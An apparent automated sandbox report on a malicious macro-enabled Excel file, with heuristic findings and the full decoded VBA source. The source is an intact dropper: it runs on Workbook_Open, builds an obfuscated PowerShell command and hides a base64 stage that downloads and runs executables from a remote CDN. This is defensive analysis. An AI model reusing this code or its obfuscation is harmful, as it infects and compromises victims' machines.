MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The OOXML document contains VBA macros, including a Workbook_Open event, which is a common technique for executing malicious code upon opening. The script utilizes WScript.Shell and CreateObject, indicating an attempt to download and execute a second-stage payload. The obfuscated string concatenation within the script further suggests malicious intent, though the exact payload URL could not be fully reconstructed.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
ccqsqwjmohopq = "WSCript.shell" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ohumcsesvacjtkbflimjcfa = CreateObject(ccqsqwjmohopq) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8966 bytes |
SHA-256: 5dd8e7ed7c970a4ed478e98a7f7bb6b106a12f384129e7dde58aa9a29ddfa545 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AddTextBeforeSelection()
Selection.InsertBefore Text:="new text "
End Sub
Private Sub workbook_open()
aiom.itm
iuyi = bfghfgfgh
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "aiom"
Sub SetParagraphRange()
Dim docActive As Document
Dim rngParagraphs As Range
Set docActive = ActiveDocument
Set rngParagraphs = docActive.Range(Start:=docActive.Paragraphs(2).Range.Start, _
End:=docActive.Paragraphs(3).Range.End)
End Sub
Sub itm()
pbrr = hff(213) & hff(223) & hff(214) & hff(146) & hff(161) & hff(213) & hff(146) & hff(194) & hff(193) & hff(208) & hff(201) & hff(208) & hff(215) & hff(196) & hff(229) & hff(208) & hff(218) & hff(215) & hff(208) & hff(190) & hff(222) & hff(146) & hff(159) & hff(183) & hff(146)
pbrr = pbrr & "WwBzAFkAcwBUAGUATQAuAFQAZQBYAHQALgBFAE4AYwBPAEQASQBuAGcAXQA6ADoAVQBOAEkAYwBPAGQAZQAuAGcARQB0AHMAVABSAEkATgBHACgAWwBTAFkAcwB0AEUATQAuAEMAbwBuAFYAZQBSAFQAXQA6ADoAZgByAE8ATQBiAGEAUwBFADYANABTAFQAUgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBA"
pbrr = pbrr & "EcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgAZwBBAFoAdwBCAHcAQQBHAEUAQQBlAFEAQgB1AEEASABrAEEAZABBAEIAbgBBAEgAYwBBAFoAZwBCADYAQQBHADAAQQBlAFEAQgAzAEEARwA4AEEAYwBnAEIAbQBBAEgARQBBAGEAdwBCAHAAQQBIAEEAQQBjAHcAQgBrAEEARwAwAEEASQBBAEEAbwBBAEMAQQBBAEoAQQBCAG8AQQBIAFUAQQBkAEEAQgAwAEEASABrAEEAWQB3AEIAegBBAEcARQBBAGUAUQBCAHgAQQBIAEEAQQBJAEEAQQBzAEEAQwBBAEEASgBBAEIANgBBAEcATQBBAGQAQQBCAHgAQQBIAGsAQQBiAFEAQgByAEEARwA0AEEAYQBRAEIAcgBBAEgASQBBAGMAQQBCAHYAQQBIAGcAQQBjAEEAQgA0AEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBiAFEAQgBRAEEARwA4AEEAYwBnAEIAMABBAEMAMABBAFQAUQBCAHYAQQBFAFEAQQ"
pbrr = pbrr & "BkAFEAQgBNAEEARwBVAEEASQBBAEIAQwBBAEcAawBBAFYAQQBCAFQAQQBIAFEAQQBVAGcAQgBCAEEARQA0AEEAVQB3AEIARwBBAEcAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgB6AEEARgBRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBHAGsAQQBkAEEAQgBUAEEASABRAEEAVQBnAEIAaABBAEUANABBAGMAdwBCAG0AQQBHAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAdgBBAEYAVQBBAFUAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBnAEEAZABRAEIAMABBAEgAUQBBAGUAUQBCAGoAQQBIAE0AQQBZAFEAQgA1AEEASABFAEEAYwBBAEEAZwBBAEMAMABBAFIAQQBCAEYAQQBGAE0AQQBkAEEAQgBwAEEARwA0AEEAWQBRAEIAVQBBAEcAawBBAFQAdwBCAHUAQQBDAEEAQQBKAEEAQgA2AEEARwBNAEEAZABBAEIAeABBAEgAawBBAGIAUQBCAHIAQQBHADQAQQBhAFEAQgByAEEASABJAEEAYwBBAEI"
pbrr = pbrr & "AdgBBAEgAZwBBAGMAQQBCADQAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIANgBBAEcATQBBAGQAQQBCAHgAQQBIAGsAQQBiAFEAQgByAEEARwA0AEEAYQBRAEIAcgBBAEgASQBBAGMAQQBCAHYAQQBIAGcAQQBjAEEAQgA0AEEARABzAEEASQBBAEIAOQBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBKAEEAQgA2AEEARwBrAEEAZABBAEIAcgBBAEcAcwBBAFoAdwBCAHQAQQBIAG8AQQBaAGcAQgA0AEEASABJAEEAYQBnAEIAbQBBAEgAZwBBAGMAUQBCAHkAQQBHADAAQQBZAHcAQgBrAEEASABRAEEAYgBBAEIAcgBBAEgAYwBBAFkAdwBCAGoAQQBHAFEAQQBiAFEAQQA5AEEAQwBRAEEAWgBRAEIATwBBAEgAWQBBAE8AZwBCADAAQQBFAFUAQQBUAFEAQgB3AEEAQwBzAEEASgB3AEIAYwBBAEcAcwBBAFoAQQBCAHUAQQBHAHMAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBI"
pbrr = pbrr & "AGcAQQBaAHcAQgB3AEEARwBFAEEAZQBRAEIAdQBBAEgAawBBAGQAQQBCAG4AQQBIAGMAQQBaAGcAQgA2AEEARwAwAEEAZQBRAEIAMwBBAEcAOABBAGMAZwBCAG0AQQBIAEUAQQBhAHcAQgBwAEEASABBAEEAYwB3AEIAawBBAEcAMABBAEkAQQBBAG4AQQBHAGcAQQBkAEEAQgAwAEEASABBAEEAYwB3AEEANgBBAEMAOABBAEwAdwBCAGoAQQBHAFEAQQBiAGcAQQB1AEEARwBRAEEAYQBRAEIAegBBAEcATQBBAGIAdwBCAHkAQQBHAFEAQQBZAFEAQgB3AEEASABBAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBHAEUAQQBkAEEAQgAwAEEARwBFAEEAWQB3AEIAbwBBAEcAMABBAFoAUQBCAHUAQQBIAFEAQQBjAHcAQQB2AEEARABnAEEATgB3AEEAdwBBAEQAWQBBAE4AdwBBAHoAQQBEAGMAQQBOAEEAQQAyAEEARABjAEEATgB3AEEAMABBAEQAVQBBAE8AUQBBADMAQQBEAFkAQQBOAFEAQQB5AEEAQwA4AEEAT"
pbrr = pbrr & "wBBAEEAMwBBAEQASQBBAE0AUQBBAHkAQQBEAGcAQQBOAEEAQQB4AEEARABNAEEATQBRAEEANABBAEQAWQBBAE4AUQBBADEAQQBEAFUAQQBPAFEAQQA0AEEARABVAEEATAB3AEIANgBBAEcAbwBBAGQAUQBCAFEAQQBHAFEAQQBaAHcAQgBYAEEARQBJAEEATwBRAEIAdwBBAEYAZwBBAFkAZwBCAFYAQQBHAFEAQQBRAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAG8AQQBhAFEAQgAwAEEARwBzAEEAYQB3AEIAbgBBAEcAMABBAGUAZwBCAG0AQQBIAGcAQQBjAGcAQgBxAEEARwBZAEEAZQBBAEIAeABBAEgASQBBAGIAUQBCAGoAQQBHAFEAQQBkAEEAQgBzAEEARwBzAEEAZAB3AEIAagBBAEcATQBBAFoAQQBCAHQAQQBEAHMAQQBEAFEAQQBLAEEASABnAEEAWgB3AEIAdwBBAEcARQBBAGUAUQBCAHUAQQBIAGsAQQBkAEEAQgBuAEEASABjAEEAWgBnAEIANgBBAEcAMABBAGUAUQBCAD"
pbrr = pbrr & "MAQQBHADgAQQBjAGcAQgBtAEEASABFAEEAYQB3AEIAcABBAEgAQQBBAGMAdwBCAGsAQQBHADAAQQBJAEEAQQBuAEEARwBnAEEAZABBAEIAMABBAEgAQQBBAGMAdwBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcAUQBBAGEAUQBCAHoAQQBHAE0AQQBiAHcAQgB5AEEARwBRAEEAWQBRAEIAdwBBAEgAQQBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB2AEEARwBFAEEAZABBAEIAMABBAEcARQBBAFkAdwBCAG8AQQBHADAAQQBaAFEAQgB1AEEASABRAEEAYwB3AEEAdgBBAEQAZwBBAE4AdwBBAHcAQQBEAFkAQQBOAHcAQQB6AEEARABjAEEATgBBAEEAMgBBAEQAYwBBAE4AdwBBADAAQQBEAFUAQQBPAFEAQQAzAEEARABZAEEATgBRAEEAeQBBAEMAOABBAE8AQQBBADMAQQBEAEkAQQBNAFEAQQB5AEEARABnAEEATgBBAEEAeABBAEQATQBBAE0AUQBBADQAQQBEAFkAQQBOAFEAQQAxAEEARAB"
pbrr = pbrr & "VAEEATwBRAEEANABBAEQAVQBBAEwAdwBCADYAQQBHAG8AQQBkAFEAQgBRAEEARwBRAEEAWgB3AEIAWABBAEUASQBBAE8AUQBCAHcAQQBGAGcAQQBZAGcAQgBWAEEARwBRAEEAUQB3AEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEASABvAEEAYQBRAEIAMABBAEcAcwBBAGEAdwBCAG4AQQBHADAAQQBlAGcAQgBtAEEASABnAEEAYwBnAEIAcQBBAEcAWQBBAGUAQQBCAHgAQQBIAEkAQQBiAFEAQgBqAEEARwBRAEEAZABBAEIAcwBBAEcAcwBBAGQAdwBCAGoAQQBHAE0AQQBaAEEAQgB0AEEARABzAEEARABRAEEASwBBAEgAZwBBAFoAdwBCAHcAQQBHAEUAQQBlAFEAQgB1AEEASABrAEEAZABBAEIAbgBBAEgAYwBBAFoAZwBCADYAQQBHADAAQQBlAFEAQgAzAEEARwA4AEEAYwBnAEIAbQBBAEgARQBBAGEAdwBCAHAAQQBIAEEAQQBjAHcAQgBrAEEARwAwAEEASQBBAEEAbgBBAEcAZwBBAGQA"
pbrr = pbrr & "QQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAUQBBAGIAZwBBAHUAQQBHAFEAQQBhAFEAQgB6AEEARwBNAEEAYgB3AEIAeQBBAEcAUQBBAFkAUQBCAHcAQQBIAEEAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEcARQBBAGQAQQBCADAAQQBHAEUAQQBZAHcAQgBvAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAGMAdwBBAHYAQQBEAGcAQQBOAHcAQQB3AEEARABZAEEATgB3AEEAegBBAEQAYwBBAE4AQQBBADIAQQBEAGMAQQBOAHcAQQAwAEEARABVAEEATwBRAEEAMwBBAEQAWQBBAE4AUQBBAHkAQQBDADgAQQBPAEEAQQAzAEEARABJAEEATQBRAEEAeQBBAEQAZwBBAE4AQQBBAHgAQQBEAE0AQQBNAFEAQQA0AEEARABZAEEATgBRAEEAMQBBAEQAVQBBAE8AUQBBADQAQQBEAFUAQQBMAHcAQgA2AEEARwBvAEEAZABRAEIAUQBBAEcAUQBBAFoAdwBCAFgAQQBFAEkAQQBPAFEAQgB3A"
pbrr = pbrr & "EEARgBnAEEAWQBnAEIAVgBBAEcAUQBBAFEAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAbwBBAGEAUQBCADAAQQBHAHMAQQBhAHcAQgBuAEEARwAwAEEAZQBnAEIAbQBBAEgAZwBBAGMAZwBCAHEAQQBHAFkAQQBlAEEAQgB4AEEASABJAEEAYgBRAEIAagBBAEcAUQBBAGQAQQBCAHMAQQBHAHMAQQBkAHcAQgBqAEEARwBNAEEAWgBBAEIAdABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAD0AIgApACkAfABJAGUAeAA="
On Error Resume Next
yzvvazyr = pbrr
rsosnqebjhymzq (yzvvazyr)
End Sub
Sub SetRangeForFirstTenCharacters()
Dim rngTenCharacters As Range
Set rngTenCharacters = ActiveDocument.Range(Start:=0, End:=10)
End Sub
Function rsosnqebjhymzq(czhsslvlqaiggqivusgtbgvhlmgaet As String)
djrnanaczokdqyecajc = 7 - 7
csdcsd = "asda sadsa sda"
ccqsqwjmohopq = "WSCript.shell"
Set ohumcsesvacjtkbflimjcfa = CreateObject(ccqsqwjmohopq)
dsgqhnnhkqpveahffuhxjqrncsqtizuohfd = ohumcsesvacjtkbflimjcfa.Run(czhsslvlqaiggqivusgtbgvhlmgaet, djrnanaczokdqyecajc)
End Function
Sub SetRangeForFirstThreeWords()
Dim docActive As Document
Dim rngThreeWords As Range
Set docActive = ActiveDocument
Set rngThreeWords = docActive.Range(Start:=docActive.Words(1).Start, _
End:=docActive.Words(3).End)
End Sub
Function hff(bgfbg As Variant)
bcvv = "gfgdfs vxcb 98"
hff = Chr(bgfbg - 114)
fgdsg = "vcxb xvcb sgd vcxb fsdg fgsdgdf"
End Function
Sub Macro1()
With Selection.ParagraphFormat
.LeftIndent = InchesToPoints(0)
.RightIndent = InchesToPoints(0)
.SpaceBefore = 6
.SpaceAfter = 6
.LineSpacingRule = 0
.Alignment = wdAlignParagraphLeft
.WidowControl = True
.KeepWithNext = False
.KeepTogether = False
.PageBreakBefore = False
.NoLineNumber = False
.Hyphenation = True
.FirstLineIndent = InchesToPoints(0)
.OutlineLevel = 10
End With
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 29184 bytes |
SHA-256: 51aa268945e1826c0823a4398df999352b5320bd8d33994608b8bafbf6739dbc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 10 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.